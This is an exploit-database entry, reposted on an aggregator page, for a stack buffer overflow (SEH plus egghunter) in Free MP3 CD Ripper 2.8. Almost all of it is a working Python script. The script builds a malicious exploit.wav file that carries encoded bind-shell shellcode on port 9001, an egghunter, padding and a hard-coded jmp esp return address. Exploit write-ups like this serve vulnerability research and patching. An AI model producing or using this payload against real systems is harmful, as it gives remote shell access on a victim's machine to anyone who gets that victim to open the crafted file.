[local] Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)

4 years ago 179
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) # Date: 2020-07-22 # Exploit Author: Eduard Palisek # Vendor Homepage: https://www.cleanersoft.com # Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe # Version: 2.8 Build 20140611 # Tested on: [Windows XP, Professional, Version 2002, SP 3 #!/usr/bin/python file = open("exploit.wav", "wb") # msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind shellcode_bind = b"" shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24" shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31" shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06" shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20" shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91" shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd" shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd" shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b" shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2" shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13" shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98" shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c" shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63" shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16" shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4" shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde" shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1" shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f" shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a" shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48" shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3" shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28" shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e" shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30" shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86" shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93" shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde" shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42" shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61" shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53" shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb" shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf" shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c" shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12" shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9" shellcode_bind += b"\xe8\xaa\x56\xc9\x38" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nops = "\x90" * 30 junk1 = "A" * 2112 tag = "W00TW00T" junk2 = "B" * (2000-len(shellcode_bind+nops+tag)) eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter file.write(buffer) file.close()
Read Entire Article